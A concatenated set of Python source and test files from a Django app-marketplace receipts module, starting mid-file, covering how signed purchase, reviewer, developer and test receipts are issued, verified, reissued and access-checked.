        eq_(res.status_code, 200)
        eq_(self.log.count(), 0)
        eq_(json.loads(res.content)['status'], 'invalid')

    @mock.patch('mkt.receipts.views.Verify')
    def test_not_there(self, verify):
        verify.return_value = self.get_mock(user=self.reviewer, status='ok')
        self.reviewer.delete()
        res = self.client.post(self.url)
        eq_(res['Access-Control-Allow-Origin'], '*')
        eq_(json.loads(res.content)['status'], 'invalid')

    @mock.patch('mkt.receipts.views.Verify')
    def test_logs(self, verify):
        verify.return_value = self.get_mock(user=self.reviewer, status='ok')
        eq_(self.log.count(), 0)
        res = self.client.post(self.url)
        eq_(self.log.count(), 1)
        eq_(res.status_code, 200)

    @mock.patch('mkt.receipts.views.Verify')
    def test_logs_developer(self, verify):
        developer = UserProfile.objects.get(pk=999)
        AddonUser.objects.create(addon=self.app, user=developer)
        verify.return_value = self.get_mock(user=developer, status='ok')
        res = self.client.post(self.url)
        eq_(res['Access-Control-Allow-Origin'], '*')
        eq_(self.log.count(), 1)
        eq_(res.status_code, 200)
class TestReceiptIssue(amo.tests.TestCase):
    """Tests for the reviewer/developer receipt issue endpoint."""
    fixtures = fixture('user_999', 'user_editor', 'user_editor_group',
                       'group_editor', 'webapp_337141')

    def setUp(self):
        super(TestReceiptIssue, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.url = reverse('receipt.issue', args=[self.app.app_slug])
        self.reviewer = UserProfile.objects.get(pk=5497308)
        self.user = UserProfile.objects.get(pk=999)

    @mock.patch('mkt.receipts.views.create_receipt')
    def test_issued(self, create_receipt):
        """A reviewer is issued a reviewer-flavoured receipt/install."""
        create_receipt.return_value = 'foo'
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(create_receipt.call_args[1]['flavour'], 'reviewer')
        eq_(self.reviewer.installed_set.all()[0].install_type,
            apps.INSTALL_TYPE_REVIEWER)

    def test_get(self):
        """GET is not allowed on the issue endpoint."""
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.get(self.url)
        eq_(res.status_code, 405)

    def test_issued_anon(self):
        """Anonymous users may not be issued receipts."""
        res = self.client.post(self.url)
        eq_(res.status_code, 403)

    def test_issued_not_reviewer(self):
        """A user who is neither reviewer nor developer is refused."""
        # Bug fix: login() requires the email string, not the UserProfile
        # object. Previously the login silently failed, so the 403 was
        # really asserting the anonymous case a second time.
        self.client.login(username=self.user.email, password='password')
        res = self.client.post(self.url)
        eq_(res.status_code, 403)

    @mock.patch('mkt.receipts.views.create_receipt')
    def test_issued_developer(self, create_receipt):
        """An author of the app gets a developer-flavoured receipt."""
        create_receipt.return_value = 'foo'
        AddonUser.objects.create(user=self.user, addon=self.app)
        self.client.login(username=self.user.email, password='password')
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(create_receipt.call_args[1]['flavour'], 'developer')
        eq_(self.user.installed_set.all()[0].install_type,
            apps.INSTALL_TYPE_DEVELOPER)

    @mock.patch('mkt.receipts.views.create_receipt')
    def test_unicode_name(self, create_receipt):
        """
        Regression test to ensure that the CEF log works. Pass through the
        app.pk instead of the full unicode name, until the CEF library is
        fixed, or heka is used.
        """
        create_receipt.return_value = 'foo'
        self.app.name = u'\u0627\u0644\u062a\u0637\u0628-news'
        self.app.save()
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
class TestReceiptCheck(amo.tests.TestCase):
    """Tests for the reviewer-only receipt check endpoint."""
    fixtures = fixture('user_999', 'user_editor', 'user_editor_group',
                       'group_editor', 'webapp_337141')

    def setUp(self):
        super(TestReceiptCheck, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        # Pending status: the check endpoint is for apps under review.
        self.app.update(status=amo.STATUS_PENDING)
        self.url = reverse('receipt.check',
                           args=[self.app.guid])
        self.reviewer = UserProfile.objects.get(pk=5497308)
        self.user = UserProfile.objects.get(pk=999)

    def test_anon(self):
        """Anonymous users are redirected (302) to log in."""
        eq_(self.client.get(self.url).status_code, 302)

    def test_not_reviewer(self):
        """A non-reviewer is forbidden (403)."""
        self.client.login(username=self.user.email, password='password')
        eq_(self.client.get(self.url).status_code, 403)

    def test_not_there(self):
        """Status is False when no receipt check has been logged."""
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(json.loads(res.content)['status'], False)

    def test_there(self):
        """Status is True once a RECEIPT_CHECKED log entry exists."""
        self.client.login(username=self.reviewer.email, password='password')
        amo.log(amo.LOG.RECEIPT_CHECKED, self.app, user=self.reviewer)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(json.loads(res.content)['status'], True)
class RawRequestFactory(RequestFactory):
    """A request factory that does not encode the body.

    Receipts are posted as raw text, so the default form encoding of
    Django's RequestFactory must be bypassed.
    """
    def _encode_data(self, data, content_type):
        # Pass the body through untouched.
        return data
@mock.patch.object(verify_settings, 'WEBAPPS_RECEIPT_KEY',
                   amo.tests.AMOPaths.sample_key())
@mock.patch.object(settings, 'SITE_URL', 'https://foo.com')
@mock.patch.object(verify_settings, 'DOMAIN', 'foo.com')
class TestDevhubReceipts(amo.tests.TestCase):
    """Tests for the devhub receipt tester pages (issue/verify flows)."""

    def setUp(self):
        self.issue = reverse('receipt.test.issue')

    def test_install_page(self):
        """The receipt tester install page renders."""
        eq_(self.client.get(reverse('receipt.test.install')).status_code, 200)

    def test_details_page(self):
        """The receipt tester details page renders."""
        eq_(self.client.get(reverse('receipt.test.details')).status_code, 200)

    def test_issue_get(self):
        """The issue endpoint only accepts POST."""
        eq_(self.client.get(self.issue).status_code, 405)

    def test_issue_none(self):
        """receipt_type 'none' yields an empty receipt."""
        data = {'receipt_type': 'none', 'manifest_url': 'http://foo.com/'}
        res = self.client.post(self.issue, data=data)
        eq_(json.loads(res.content)['receipt'], '')

    def test_bad_url(self):
        """An empty manifest_url is a form error."""
        data = {'receipt_type': 'none', 'manifest_url': ''}
        res = self.client.post(self.issue, data=data)
        ok_(json.loads(res.content)['error'], '')

    def test_issue_expired(self):
        """An 'expired' test receipt points at the expired verifier and
        still carries a ~24h expiry timestamp (within leeway)."""
        data = {'receipt_type': 'expired', 'manifest_url': 'http://foo.com/'}
        res = self.client.post(self.issue, data=data)
        data = decode_receipt(json.loads(res.content)['receipt']
                                  .encode('ascii'))
        eq_(data['verify'], absolutify(reverse('receipt.test.verify',
                                       kwargs={'status': 'expired'})))
        ok_(data['exp'] > (calendar.timegm(time.gmtime()) +
                           (60 * 60 * 24) - TEST_LEEWAY))

    def test_issue_other(self):
        """An unknown receipt_type is a form error."""
        data = {'receipt_type': 'foo', 'manifest_url': ''}
        res = self.client.post(self.issue, data=data)
        ok_(json.loads(res.content)['error'])

    def test_verify_fails(self):
        """An empty body fails verification as 'invalid'."""
        req = RawRequestFactory().post('/', '')
        res = devhub_verify(req, 'expired')
        eq_(json.loads(res.content)['status'], 'invalid')

    def test_verify(self):
        """A signed test receipt verifies with its declared status."""
        url = absolutify(reverse('receipt.test.verify',
                                 kwargs={'status': 'expired'}))
        receipt = create_test_receipt('http://foo', 'expired')
        req = RawRequestFactory().post(url, receipt)
        res = devhub_verify(req, 'expired')
        eq_(json.loads(res.content)['status'], 'expired')
########NEW FILE########
__FILENAME__ = test_views_api
import json
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from receipts.receipts import Receipt
import amo.tests
from addons.models import Addon, AddonUser
from constants.payments import CONTRIB_NO_CHARGE
from devhub.models import AppLog
from mkt.api.tests.test_oauth import RestOAuth
from mkt.constants import apps
from mkt.receipts.tests.test_verify import sample
from mkt.site.fixtures import fixture
from users.models import UserProfile
class TestAPI(RestOAuth):
    """Tests for the receipt install REST endpoint (metrics/logging)."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestAPI, self).setUp()
        self.addon = Addon.objects.get(pk=337141)
        self.url = reverse('receipt.install')
        self.data = json.dumps({'app': self.addon.pk})
        self.profile = self.user

    def test_has_cors(self):
        """The endpoint advertises CORS for POST."""
        self.assertCORS(self.client.post(self.url), 'post')

    def post(self, anon=False):
        """POST self.data, optionally as the anonymous client."""
        client = self.client if not anon else self.anon
        return client.post(self.url, data=self.data)

    def test_no_app(self):
        """A non-existent app pk is a 400."""
        self.data = json.dumps({'app': 0})
        eq_(self.post().status_code, 400)

    def test_app_slug(self):
        """The app may be addressed by slug as well as pk."""
        self.data = json.dumps({'app': self.addon.app_slug})
        eq_(self.post().status_code, 201)

    def test_record_logged_out(self):
        """Anonymous installs are forbidden."""
        res = self.post(anon=True)
        eq_(res.status_code, 403)

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_cef_logs(self, cef):
        """Exactly one CEF 'sign' entry per install."""
        eq_(self.post().status_code, 201)
        eq_(len(cef.call_args_list), 1)
        eq_([x[0][2] for x in cef.call_args_list], ['sign'])

    @mock.patch('mkt.installs.utils.record_action')
    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_metrics(self, cef, record_action):
        """Install metrics include the hosted app's domain."""
        res = self.post()
        eq_(res.status_code, 201)
        record_action.assert_called_with(
            'install', mock.ANY, {'app-domain': u'http://micropipes.com',
                                  'app-id': self.addon.pk,
                                  'region': 'restofworld',
                                  'anonymous': False})

    @mock.patch('mkt.installs.utils.record_action')
    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_metrics_packaged_app(self, cef, record_action):
        """Packaged apps (no manifest/domain) record app-domain None."""
        # Mimic packaged app.
        self.addon.update(is_packaged=True, manifest_url=None,
                          app_domain=None)
        res = self.post()
        eq_(res.status_code, 201)
        record_action.assert_called_with(
            'install', mock.ANY, {'app-domain': None,
                                  'app-id': self.addon.pk,
                                  'region': 'restofworld',
                                  'anonymous': False})

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_log_metrics(self, cef):
        """Each install creates one INSTALL_ADDON AppLog entry."""
        eq_(self.post().status_code, 201)
        logs = AppLog.objects.filter(addon=self.addon)
        eq_(logs.count(), 1)
        eq_(logs[0].activity_log.action, amo.LOG.INSTALL_ADDON.id)
class TestDevhubAPI(RestOAuth):
    """Tests for the anonymous test-receipt REST endpoint."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestDevhubAPI, self).setUp()
        self.data = json.dumps({'manifest_url': 'http://foo.com',
                                'receipt_type': 'expired'})
        self.url = reverse('receipt.test')

    def test_has_cors(self):
        """The endpoint advertises CORS for POST."""
        self.assertCORS(self.client.post(self.url), 'post')

    def test_decode(self):
        """The issued receipt decodes and carries typ 'test-receipt'."""
        res = self.anon.post(self.url, data=self.data)
        eq_(res.status_code, 201)
        data = json.loads(res.content)
        receipt = Receipt(data['receipt'].encode('ascii')).receipt_decoded()
        eq_(receipt['typ'], u'test-receipt')

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_cef_log(self, cef):
        """Test receipt signing is CEF logged."""
        self.anon.post(self.url, data=self.data)
        cef.assert_called_with(mock.ANY, None, 'sign', 'Test receipt signing')
class TestReceipt(RestOAuth):
    """Tests for install/receipt issuing across app states and users."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestReceipt, self).setUp()
        self.addon = Addon.objects.get(pk=337141)
        self.data = json.dumps({'app': self.addon.pk})
        self.profile = UserProfile.objects.get(pk=2519)
        self.url = reverse('receipt.install')

    def post(self, anon=False):
        """POST self.data, optionally as the anonymous client."""
        client = self.client if not anon else self.anon
        return client.post(self.url, data=self.data)

    def test_pending_free_for_developer(self):
        """A developer may install their own pending free app."""
        AddonUser.objects.create(addon=self.addon, user=self.profile)
        self.addon.update(status=amo.STATUS_PENDING)
        eq_(self.post().status_code, 201)

    def test_pending_free_for_anonymous(self):
        """Anonymous users cannot install a pending app."""
        self.addon.update(status=amo.STATUS_PENDING)
        self.anon.post(self.url)
        eq_(self.post(anon=True).status_code, 403)

    def test_pending_paid_for_developer(self):
        """A developer install of a pending paid app is a dev install."""
        AddonUser.objects.create(addon=self.addon, user=self.profile)
        self.addon.update(status=amo.STATUS_PENDING,
                          premium_type=amo.ADDON_PREMIUM)
        eq_(self.post().status_code, 201)
        eq_(self.profile.installed_set.all()[0].install_type,
            apps.INSTALL_TYPE_DEVELOPER)

    def test_pending_paid_for_anonymous(self):
        """Anonymous users cannot install a pending paid app."""
        self.addon.update(status=amo.STATUS_PENDING,
                          premium_type=amo.ADDON_PREMIUM)
        eq_(self.post(anon=True).status_code, 403)

    def test_not_record_addon(self):
        """Non-webapp add-ons are rejected with a 400."""
        self.addon.update(type=amo.ADDON_EXTENSION)
        r = self.client.post(self.url)
        eq_(r.status_code, 400)

    @mock.patch('mkt.webapps.models.Webapp.has_purchased')
    def test_paid(self, has_purchased):
        """A purchased premium app installs fine."""
        has_purchased.return_value = True
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        r = self.post()
        eq_(r.status_code, 201)

    def test_own_payments(self):
        """Apps using their own in-app payments install without purchase."""
        self.addon.update(premium_type=amo.ADDON_OTHER_INAPP)
        eq_(self.post().status_code, 201)

    def test_no_charge(self):
        """A zero-priced premium app installs and creates a NO_CHARGE
        purchase record."""
        self.make_premium(self.addon, '0.00')
        eq_(self.post().status_code, 201)
        eq_(self.profile.installed_set.all()[0].install_type,
            apps.INSTALL_TYPE_USER)
        eq_(self.profile.addonpurchase_set.all()[0].type,
            CONTRIB_NO_CHARGE)

    @mock.patch('mkt.webapps.models.Webapp.has_purchased')
    def test_not_paid(self, has_purchased):
        """An unpurchased premium app is 402 Payment Required."""
        has_purchased.return_value = False
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        eq_(self.post().status_code, 402)

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_install(self, cef):
        """A user install creates one Installed row of type USER."""
        self.post()
        installed = self.profile.installed_set.all()
        eq_(len(installed), 1)
        eq_(installed[0].install_type, apps.INSTALL_TYPE_USER)

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_multiple_installs(self, cef):
        """Repeat installs re-use the existing Installed row."""
        self.post()
        r = self.post()
        eq_(r.status_code, 201)
        eq_(self.profile.installed_set.count(), 1)

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_receipt(self, cef):
        """The returned receipt decodes successfully."""
        r = self.post()
        ok_(Receipt(r.data['receipt']).receipt_decoded())
class TestReissue(amo.tests.TestCase):
    """Tests for the receipt reissue REST endpoint."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        # Consistency fix: call the base setUp like every other test
        # case in this file does.
        super(TestReissue, self).setUp()
        self.addon = Addon.objects.get(pk=337141)
        self.url = reverse('receipt.reissue')
        self.data = json.dumps({'app': self.addon.pk})
        verify = mock.patch('mkt.receipts.views.Verify.check_full')
        self.verify = verify.start()
        self.addCleanup(verify.stop)

    def test_get(self):
        """Only POST is accepted; GET is 405."""
        eq_(self.client.get(self.url).status_code, 405)

    def test_invalid(self):
        """An invalid receipt is rejected with a 400."""
        self.verify.return_value = {'status': 'invalid'}
        res = self.client.post(self.url, data={})
        eq_(res.status_code, 400)

    def test_valid(self):
        """A still-valid receipt is not reissued: 400 and no receipt."""
        self.verify.return_value = {'status': 'valid'}
        res = self.client.post(self.url, data={})
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        ok_(not data['receipt'])
        # Bug fix: this used ok_(data['status'], 'valid'), which treats
        # 'valid' as the failure *message* and only checks truthiness;
        # eq_ actually asserts the value.
        eq_(data['status'], 'valid')

    def test_expired(self):
        """An expired receipt is reissued with a 200."""
        self.verify.return_value = {'status': 'expired'}
        res = self.client.post(self.url, data=sample,
                               content_type='text/plain')
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        ok_(data['receipt'])
        eq_(data['status'], 'expired')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
import amo
from . import views
# Note: this URL is embedded in receipts, if you change the URL, make sure
# that you put a redirect in.
app_receipt_patterns = patterns('',
    # TODO: remove this?
    url('^record$', views.record_anon, name='detail.record'),
)

# Verify / issue / check endpoints, addressed by app guid or slug.
receipt_patterns = patterns('',
    url(r'^verify/%s$' % amo.ADDON_UUID, views.verify,
        name='receipt.verify'),
    url(r'^issue/%s$' % amo.APP_SLUG, views.issue,
        name='receipt.issue'),
    url(r'^check/%s$' % amo.ADDON_UUID, views.check,
        name='receipt.check'),
)

# REST API endpoints for install, test receipts and reissue.
# NOTE(review): these patterns have no trailing '$' anchor — presumably
# deliberate to allow format suffixes; confirm before tightening.
receipt_api_patterns = patterns('',
    url(r'^receipts/install/', views.install, name='receipt.install'),
    url(r'^receipts/test/', views.test_receipt, name='receipt.test'),
    url(r'^receipts/reissue/', views.reissue, name='receipt.reissue')
)

# Devhub receipt tester pages.
test_patterns = patterns('',
    url('^$', views.devhub_install,
        name='receipt.test.install'),
    url('^issue/$', views.devhub_receipt,
        name='receipt.test.issue'),
    url('^details/$', views.devhub_details,
        name='receipt.test.details'),
    url('^verify/(?P<status>ok|expired|invalid|refunded)/$',
        views.devhub_verify,
        name='receipt.test.verify'),
)
########NEW FILE########
__FILENAME__ = utils
import calendar
import time
from urllib import urlencode
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
import jwt
from nose.tools import nottest
from receipts.receipts import Receipt
from access import acl
from amo.helpers import absolutify
from lib.crypto import receipt
def get_uuid(app, user):
    """Return the uuid for this user's purchase of *app*, for use in the
    receipt.

    Looks up the purchase table; when no purchase row exists, the
    literal string 'none' is returned instead.

    :param app: the app record.
    :param user: the UserProfile record.
    """
    try:
        purchase = app.addonpurchase_set.get(user=user)
    except ObjectDoesNotExist:
        return 'none'
    return purchase.uuid
def sign(data):
    """Return *data* as a signed receipt.

    Delegates to the separate signing server when it is active;
    otherwise signs locally with JWT (RS512).

    :param data: the receipt contents to be signed.
    """
    if not settings.SIGNING_SERVER_ACTIVE:
        return jwt.encode(data, get_key(), u'RS512')
    return receipt.sign(data)
def create_receipt(webapp, user, uuid, flavour=None):
    """
    Creates a receipt for use in payments.

    :params webapp: the app record.
    :params user: the UserProfile record.
    :params uuid: a uuid placed in the user field for this purchase.
    :params flavour: None, developer or reviewer, the flavour of receipt.

    :raises ValueError: when a flavour is requested for a user who is
        neither a reviewer nor an author of the app.
    """
    assert flavour in [None, 'developer', 'reviewer'], (
        'Invalid flavour: %s' % flavour)

    time_ = calendar.timegm(time.gmtime())
    typ = 'purchase-receipt'

    product = {'storedata': urlencode({'id': int(webapp.pk)}),
               # Packaged and hosted apps should have an origin. If there
               # isn't one, fallback to the SITE_URL.
               'url': webapp.origin or settings.SITE_URL}

    # Generate different receipts for reviewers or developers.
    expiry = time_ + settings.WEBAPPS_RECEIPT_EXPIRY_SECONDS
    if flavour:
        if not (acl.action_allowed_user(user, 'Apps', 'Review') or
                webapp.has_author(user)):
            raise ValueError('User %s is not a reviewer or developer' %
                             user.pk)

        # Developer and reviewer receipts should expire after 24 hours.
        expiry = time_ + (60 * 60 * 24)
        typ = flavour + '-receipt'
        verify = absolutify(reverse('receipt.verify', args=[webapp.guid]))
    else:
        verify = settings.WEBAPPS_RECEIPT_URL

    reissue = absolutify(reverse('receipt.reissue'))
    # NOTE(review): reissue is already absolute here, so the extra
    # absolutify() calls below look like no-ops — confirm before removing.
    receipt = dict(exp=expiry, iat=time_,
                   iss=settings.SITE_URL, nbf=time_, product=product,
                   # TODO: This is temporary until detail pages get added.
                   detail=absolutify(reissue),  # Currently this is a 404.
                   reissue=absolutify(reissue),
                   typ=typ,
                   user={'type': 'directed-identifier',
                         'value': uuid},
                   verify=verify)
    return sign(receipt)
def reissue_receipt(receipt):
    """Re-sign an existing receipt with refreshed timestamps.

    Requires a well formatted receipt, but does not verify the receipt
    contents.

    :param receipt: an existing (encoded) receipt.
    """
    now = calendar.timegm(time.gmtime())
    data = Receipt(receipt).receipt_decoded()
    data['iat'] = now
    data['nbf'] = now
    data['exp'] = now + settings.WEBAPPS_RECEIPT_EXPIRY_SECONDS
    return sign(data)
@nottest
def create_test_receipt(root, status):
    """Create a signed 24-hour test receipt for the devhub tester.

    :param root: the app URL placed in the product field.
    :param status: status slug baked into the verify URL
                   (ok/expired/invalid/refunded).
    """
    time_ = calendar.timegm(time.gmtime())
    detail = absolutify(reverse('receipt.test.details'))
    receipt = {
        # NOTE(review): detail is already absolute; the second
        # absolutify() appears redundant — confirm before removing.
        'detail': absolutify(detail),
        'exp': time_ + (60 * 60 * 24),
        'iat': time_,
        'iss': settings.SITE_URL,
        'nbf': time_,
        'product': {
            'storedata': urlencode({'id': 0}),
            'url': root,
        },
        'reissue': detail,
        'typ': 'test-receipt',
        'user': {
            'type': 'directed-identifier',
            'value': 'none'
        },
        'verify': absolutify(reverse('receipt.test.verify',
                                     kwargs={'status': status}))
    }
    return sign(receipt)
def get_key():
    """Return the RSA key (loaded from settings) for use with jwt.encode."""
    return jwt.rsa_load(settings.WEBAPPS_RECEIPT_KEY)
########NEW FILE########
__FILENAME__ = views
import json
from django import http
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404, render
from django.views.decorators.csrf import csrf_exempt
import commonware.log
from rest_framework.decorators import (authentication_classes,
permission_classes)
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from session_csrf import anonymous_csrf_exempt
from tower import ugettext as _
import amo
import amo.log
from access import acl
from addons.decorators import addon_view_factory
from addons.models import Addon
from amo.decorators import json_view, post_required, write
from constants.payments import CONTRIB_NO_CHARGE
from devhub.models import AppLog
from editors.views import reviewer_required
from lib.cef_loggers import receipt_cef
from lib.crypto.receipt import SigningError
from lib.metrics import record_action
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import cors_api_view
from mkt.constants import apps
from mkt.installs.utils import install_type, record as utils_record
from mkt.receipts import forms
from mkt.receipts.utils import (create_receipt, create_test_receipt, get_uuid,
reissue_receipt)
from mkt.webapps.models import Installed, Webapp
from mkt.prices.models import AddonPurchase
from services.verify import get_headers, Verify
from users.models import UserProfile
log = commonware.log.getLogger('z.receipts')

# View decorators: one restricted to valid (public) apps, one accepting
# any app regardless of status.
addon_view = addon_view_factory(qs=Webapp.objects.valid)
addon_all_view = addon_view_factory(qs=Webapp.objects.all)
def _record(request, addon):
    """Record an install of *addon* and, for logged-in users, issue a
    receipt.

    Returns a context dict with the addon pk and, when a receipt was
    attempted, 'receipt' and 'error' keys. Premium apps require login;
    anonymous premium requests are redirected to the login page.
    """
    logged = request.user.is_authenticated()
    premium = addon.is_premium()

    # Require login for premium.
    if not logged and premium:
        return http.HttpResponseRedirect(reverse('users.login'))

    ctx = {'addon': addon.pk}

    # Don't generate receipts if we're allowing logged-out install.
    if logged:
        is_dev = request.check_ownership(addon, require_owner=False,
                                         ignore_disabled=True, admin=False)
        is_reviewer = acl.check_reviewer(request)
        # Non-public apps are only visible to their reviewers/developers.
        if (not addon.is_webapp() or not addon.is_public() and
                not (is_reviewer or is_dev)):
            raise http.Http404

        if (premium and
                not addon.has_purchased(request.amo_user) and
                not is_reviewer and not is_dev):
            raise PermissionDenied

        # If you are reviewer, you get a user receipt. Use the reviewer tools
        # to get a reviewer receipt. App developers still get their special
        # receipt.
        install_type = (apps.INSTALL_TYPE_DEVELOPER if is_dev
                        else apps.INSTALL_TYPE_USER)

        # Log the install.
        installed, c = Installed.objects.get_or_create(addon=addon,
            user=request.amo_user, install_type=install_type)

        # Get a suitable uuid for this receipt.
        uuid = get_uuid(addon, request.amo_user)

        error = ''
        # Bug fix: initialise receipt so a SigningError doesn't leave it
        # unbound and turn the error path into a NameError below.
        receipt = None
        receipt_cef.log(request, addon, 'sign', 'Receipt requested')
        try:
            receipt = create_receipt(addon, request.amo_user, uuid)
        except SigningError:
            error = _('There was a problem installing the app.')

        ctx.update(receipt=receipt, error=error)
    else:
        if not addon.is_public() or not addon.is_webapp():
            raise http.Http404

    amo.log(amo.LOG.INSTALL_ADDON, addon)
    record_action('install', request, {
        'app-domain': addon.domain_from_url(addon.origin, allow_none=True),
        'app-id': addon.pk,
        'anonymous': request.user.is_anonymous(),
    })
    return ctx
@anonymous_csrf_exempt
@json_view
@addon_all_view
@post_required
@write
def record_anon(request, addon):
    """Record an install, allowing anonymous (CSRF-exempt) requests."""
    return _record(request, addon)
@json_view
@addon_all_view
@post_required
@write
def record(request, addon):
    """Record an install for the current (CSRF-protected) session."""
    return _record(request, addon)
# Set the CORS headers on the response by calling get_headers.
def response(data):
    """Wrap *data* in an HttpResponse carrying the verifier's headers."""
    resp = http.HttpResponse(data)
    for header, value in get_headers(len(data)):
        resp[header] = value
    return resp
@csrf_exempt
@post_required
def verify(request, uuid):
    """Verify a reviewer/developer receipt posted as the raw body.

    :param uuid: the app guid embedded in the receipt's verify URL.
    """
    # Because this will be called at any point in the future,
    # use guid in the URL.
    addon = get_object_or_404(Addon, guid=uuid)
    receipt = request.read()
    verify = Verify(receipt, request.META)
    output = verify.check_without_purchase()

    # Only reviewers or the developers can use this which is different
    # from the standard receipt verification. The user is contained in the
    # receipt.
    if verify.user_id:
        try:
            user = UserProfile.objects.get(pk=verify.user_id)
        except UserProfile.DoesNotExist:
            user = None

        if user and (acl.action_allowed_user(user, 'Apps', 'Review')
                     or addon.has_author(user)):
            amo.log(amo.LOG.RECEIPT_CHECKED, addon, user=user)
            return response(output)

    # Anyone else (or an unknown user) gets an 'invalid' answer.
    return response(verify.invalid())
@addon_all_view
@json_view
@post_required
def issue(request, addon):
    """Issue a reviewer- or developer-flavoured receipt for *addon*.

    Raises PermissionDenied unless the requesting user is an app
    reviewer or an author of the app.
    """
    user = request.amo_user
    review = acl.action_allowed_user(user, 'Apps', 'Review') if user else None
    developer = addon.has_author(user)
    if not (review or developer):
        raise PermissionDenied

    # Reviewer status wins over developer status.
    install, flavour = ((apps.INSTALL_TYPE_REVIEWER, 'reviewer') if review
                        else (apps.INSTALL_TYPE_DEVELOPER, 'developer'))
    installed, c = Installed.objects.safer_get_or_create(addon=addon,
        user=request.amo_user, install_type=install)

    error = ''
    receipt_cef.log(request, addon, 'sign', 'Receipt signing for %s' % flavour)
    receipt = None
    try:
        receipt = create_receipt(addon, user, get_uuid(addon, user),
                                 flavour=flavour)
    except SigningError:
        error = _('There was a problem installing the app.')

    return {'addon': addon.pk, 'receipt': receipt, 'error': error}
@json_view
@reviewer_required
def check(request, uuid):
    """Report whether a receipt check has ever been logged for the app.

    :param uuid: the app guid (stable even if the app is renamed).
    """
    # Because this will be called at any point in the future,
    # use guid in the URL.
    addon = get_object_or_404(Addon, guid=uuid)
    qs = (AppLog.objects.order_by('-created')
                .filter(addon=addon,
                        activity_log__action=amo.LOG.RECEIPT_CHECKED.id))
    return {'status': qs.exists()}
# These methods are for the test of receipts in the devhub.
def devhub_install(request):
    """Render the devhub receipt-tester install page."""
    return render(request, 'receipts/test_manifest.html',
                  {'form': forms.TestInstall()})
@anonymous_csrf_exempt
@json_view
@post_required
def devhub_receipt(request):
    """Issue a test receipt from the devhub tester form.

    Returns {'receipt': ..., 'error': ...}; 'none' receipt_type yields
    an empty receipt, invalid form data returns the form errors.
    """
    form = forms.TestInstall(request.POST)
    if form.is_valid():
        data = form.cleaned_data
        if data['receipt_type'] == 'none':
            return {'receipt': '', 'error': ''}

        receipt_cef.log(request, None, 'sign', 'Test receipt signing')
        receipt = create_test_receipt(data['root'], data['receipt_type'])
        return {'receipt': receipt, 'error': ''}
    return {'receipt': '', 'error': form.errors}
def devhub_details(request):
    """Render the devhub receipt-tester details page."""
    return render(request, 'receipts/test_details.html')
@csrf_exempt
@post_required
def devhub_verify(request, status):
    """Verify a test receipt (raw body) against the requested *status*,
    without hitting the database."""
    receipt = request.read()
    verify = Verify(receipt, request.META)
    return response(json.dumps(verify.check_without_db(status)))
@cors_api_view(['POST'])
@authentication_classes([RestOAuthAuthentication,
                         RestSharedSecretAuthentication])
@permission_classes([IsAuthenticated])
def install(request):
    """Record an install and return a signed receipt (REST API).

    Developers bypass the public/purchase checks; everyone else needs
    the app public and, for premium apps, purchased (402 otherwise).
    """
    form = forms.ReceiptForm(request.DATA)

    if not form.is_valid():
        return Response({'error_message': form.errors}, status=400)

    obj = form.cleaned_data['app']
    type_ = install_type(request, obj)

    if type_ == apps.INSTALL_TYPE_DEVELOPER:
        receipt = install_record(obj, request,
                                 apps.INSTALL_TYPE_DEVELOPER)
    else:
        # The app must be public and if its a premium app, you
        # must have purchased it.
        if not obj.is_public():
            log.info('App not public: %s' % obj.pk)
            return Response('App not public.', status=403)

        if (obj.is_premium() and
                not obj.has_purchased(request.amo_user)):
            # Apps that are premium but have no charge will get an
            # automatic purchase record created. This will ensure that
            # the receipt will work into the future if the price changes.
            if obj.premium and not obj.premium.price.price:
                log.info('Create purchase record: {0}'.format(obj.pk))
                AddonPurchase.objects.get_or_create(addon=obj,
                    user=request.amo_user, type=CONTRIB_NO_CHARGE)
            else:
                log.info('App not purchased: %s' % obj.pk)
                return Response('You have not purchased this app.',
                                status=402)
        receipt = install_record(obj, request, type_)
    utils_record(request, obj)
    return Response({'receipt': receipt}, status=201)
def install_record(obj, request, install_type):
    """Create (or re-use) the Installed row and return a signed receipt.

    NOTE(review): the install_type parameter shadows the imported
    mkt.installs.utils.install_type function within this scope.
    """
    # Generate or re-use an existing install record.
    installed, created = Installed.objects.get_or_create(
        addon=obj, user=request.user,
        install_type=install_type)
    log.info('Installed record %s: %s' % (
        'created' if created else 're-used',
        obj.pk))

    log.info('Creating receipt: %s' % obj.pk)
    receipt_cef.log(request._request, obj, 'sign', 'Receipt signing')
    uuid = get_uuid(installed.addon, installed.user)
    return create_receipt(installed.addon, installed.user, uuid)
